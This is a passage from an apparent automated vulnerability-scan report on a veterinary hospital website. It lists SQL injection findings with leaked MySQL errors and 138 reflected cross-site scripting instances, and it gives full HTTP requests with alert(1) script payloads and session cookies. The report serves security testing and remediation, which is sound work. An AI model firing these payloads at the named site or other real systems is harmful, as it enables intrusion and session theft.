Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2246
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='plymouth''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth''
                        limit 1' at line 31

Request 2

GET /plymouth''/more/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Length: 7909
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...

1.20. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/tools/markers_sema.php

Issue detail

The sema parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sema parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /tools/markers_sema.php?sema=E13' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 198
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''E13'' AND i_emergency_only <> 1
ORDER BY distance' at line 24

Request 2

GET /tools/markers_sema.php?sema=E13'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:13 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 65
Content-Type: text/xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<markers>
</markers>

2. Cross-site scripting (reflected) previous next
There are 138 instances of this issue:

/becker/markers.php [REST URL parameter 2]
/hanson/appt.html [REST URL parameter 2]
/hanson/appt.html [altphone parameter]
/hanson/appt.html [ampm1 parameter]
/hanson/appt.html [ampm2 parameter]
/hanson/appt.html [ampm3 parameter]
/hanson/appt.html [name of an arbitrarily supplied request parameter]
/hanson/offer.html [addr parameter]
/hanson/offer.html [captcha_code parameter]
/hanson/offer.html [city parameter]
/hanson/offer.html [email parameter]
/hanson/offer.html [fname parameter]
/hanson/offer.html [formtype parameter]
/hanson/offer.html [guid parameter]
/hanson/offer.html [ipaddress parameter]
/hanson/offer.html [js parameter]
/hanson/offer.html [lname parameter]
/main/offer [ parameter]
/main/offer [&optin parameter]
/main/offer [&state parameter]
/main/offer [addr parameter]
/main/offer [city parameter]
/main/offer [date parameter]
/main/offer [email parameter]
/main/offer [fname parameter]
/main/offer [formtype parameter]
/main/offer [gclid parameter]
/main/offer [guid parameter]
/main/offer [ipaddress parameter]
/main/offer [lname parameter]
/main/offer [name of an arbitrarily supplied request parameter]
/main/offer [newmex parameter]
/main/offer [optin parameter]
/main/offer [other parameter]
/main/offer [petage parameter]
/main/offer [petname parameter]
/main/offer [pettype parameter]
/main/offer [phone parameter]
/main/offer [r parameter]
/main/offer [referer parameter]
/main/offer [state parameter]
/main/offer [submit parameter]
/main/offer [token parameter]
/main/offer [tollfree parameter]
/main/offer [uri parameter]
/main/offer [useragent parameter]
/main/offer [utm_campaign parameter]
/main/offer [utm_medium parameter]
/main/offer [utm_source parameter]
/main/offer [utm_term parameter]
/main/offer [variant parameter]
/main/offer [zip parameter]
/main/offer/ [ parameter]
/main/offer/ [&optin parameter]
/main/offer/ [&state parameter]
/main/offer/ [addr parameter]
/main/offer/ [city parameter]
/main/offer/ [date parameter]
/main/offer/ [email parameter]
/main/offer/ [fname parameter]
/main/offer/ [formtype parameter]
/main/offer/ [guid parameter]
/main/offer/ [ipaddress parameter]
/main/offer/ [lname parameter]
/main/offer/ [name of an arbitrarily supplied request parameter]
/main/offer/ [newmex parameter]
/main/offer/ [optin parameter]
/main/offer/ [other parameter]
/main/offer/ [petage parameter]
/main/offer/ [petname parameter]
/main/offer/ [pettype parameter]
/main/offer/ [phone parameter]
/main/offer/ [referer parameter]
/main/offer/ [state parameter]
/main/offer/ [submit parameter]
/main/offer/ [token parameter]
/main/offer/ [tollfree parameter]
/main/offer/ [uri parameter]
/main/offer/ [useragent parameter]
/main/offer/ [variant parameter]
/main/offer/ [zip parameter]
/main/offer/thank-you.html [REST URL parameter 3]
/main/offer/thank-you.html [REST URL parameter 3]
/manhattan-veterinary-group/appt.html [REST URL parameter 2]
/manhattan-veterinary-group/appt.html [name of an arbitrarily supplied request parameter]
/marshfield/appt.html [REST URL parameter 2]
/marshfield/appt.html [name of an arbitrarily supplied request parameter]
/new-york-veterinary-hospital/appt.html [REST URL parameter 2]
/new-york-veterinary-hospital/appt.html [altphone parameter]
/new-york-veterinary-hospital/appt.html [ampm1 parameter]
/new-york-veterinary-hospital/appt.html [ampm2 parameter]
/new-york-veterinary-hospital/appt.html [ampm3 parameter]
/new-york-veterinary-hospital/appt.html [appt_type parameter]
/new-york-veterinary-hospital/appt.html [client parameter]
/new-york-veterinary-hospital/appt.html [date1 parameter]
/new-york-veterinary-hospital/appt.html [date2 parameter]
/new-york-veterinary-hospital/appt.html [date3 parameter]
/new-york-veterinary-hospital/appt.html [doctor parameter]
/new-york-veterinary-hospital/appt.html [email parameter]
/new-york-veterinary-hospital/appt.html [fname parameter]
/new-york-veterinary-hospital/appt.html [guid parameter]
/new-york-veterinary-hospital/appt.html [ipaddress parameter]
/new-york-veterinary-hospital/appt.html [lname parameter]
/new-york-veterinary-hospital/appt.html [name of an arbitrarily supplied request parameter]
/new-york-veterinary-hospital/appt.html [optin parameter]
/new-york-veterinary-hospital/appt.html [other parameter]
/new-york-veterinary-hospital/appt.html [petage parameter]
/new-york-veterinary-hospital/appt.html [petname parameter]
/new-york-veterinary-hospital/appt.html [pettype parameter]
/new-york-veterinary-hospital/appt.html [phone parameter]
/new-york-veterinary-hospital/appt.html [reason parameter]
/new-york-veterinary-hospital/appt.html [referer parameter]
/new-york-veterinary-hospital/appt.html [source parameter]
/new-york-veterinary-hospital/appt.html [submit parameter]
/new-york-veterinary-hospital/appt.html [time1 parameter]
/new-york-veterinary-hospital/appt.html [time2 parameter]
/new-york-veterinary-hospital/appt.html [time3 parameter]
/new-york-veterinary-hospital/appt.html [token parameter]
/new-york-veterinary-hospital/appt.html [uri parameter]
/new-york-veterinary-hospital/appt.html [useragent parameter]
/plymouth/appt.html [REST URL parameter 2]
/plymouth/appt.html [name of an arbitrarily supplied request parameter]
/plymouth/more/boarding.html [REST URL parameter 2]
/hanson/appt.html [Referer HTTP header]
/hanson/appt.html [User-Agent HTTP header]
/main/offer [Referer HTTP header]
/main/offer [User-Agent HTTP header]
/main/offer/ [Referer HTTP header]
/main/offer/ [User-Agent HTTP header]
/main/offer/thank-you.html [Referer HTTP header]
/manhattan-veterinary-group/appt.html [Referer HTTP header]
/manhattan-veterinary-group/appt.html [User-Agent HTTP header]
/marshfield/appt.html [Referer HTTP header]
/marshfield/appt.html [User-Agent HTTP header]
/new-york-veterinary-hospital/appt.html [Referer HTTP header]
/new-york-veterinary-hospital/appt.html [User-Agent HTTP header]
/plymouth/appt.html [Referer HTTP header]
/plymouth/appt.html [User-Agent HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.vcahospitals.com/becker/markers.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/becker/markers.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dfec"><a>30055149e9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /becker/markers.php6dfec"><a>30055149e9d?lat=40.7388648&lng=-73.9831733&ffe HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/directory.html?utm_content=link.corp.ffe.locator.
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:48:18 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<body id="markers6dfec"><a>30055149e9d">
...[SNIP]...

2.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54666"><a>31d8f105f44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hanson/appt.html54666"><a>31d8f105f44 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<body id="appt54666"><a>31d8f105f44">
...[SNIP]...

2.3. http://www.vcahospitals.com/hanson/appt.html [altphone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The value of the altphone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 624cd"><script>alert(1)</script>82000bb6032 was submitted in the altphone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=624cd"><script>alert(1)</script>82000bb6032&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:16 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4udruo5a6bh9ud6vq7kq83b113; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="altphone" id="altphone" type="text" size="30" maxlength="20" value="624cd"><script>alert(1)</script>82000bb6032" />
...[SNIP]...

2.4. http://www.vcahospitals.com/hanson/appt.html [ampm1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The value of the ampm1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bae55"><script>alert(1)</script>803b193c3aa was submitted in the ampm1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=&ampm1=AMbae55"><script>alert(1)</script>803b193c3aa&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%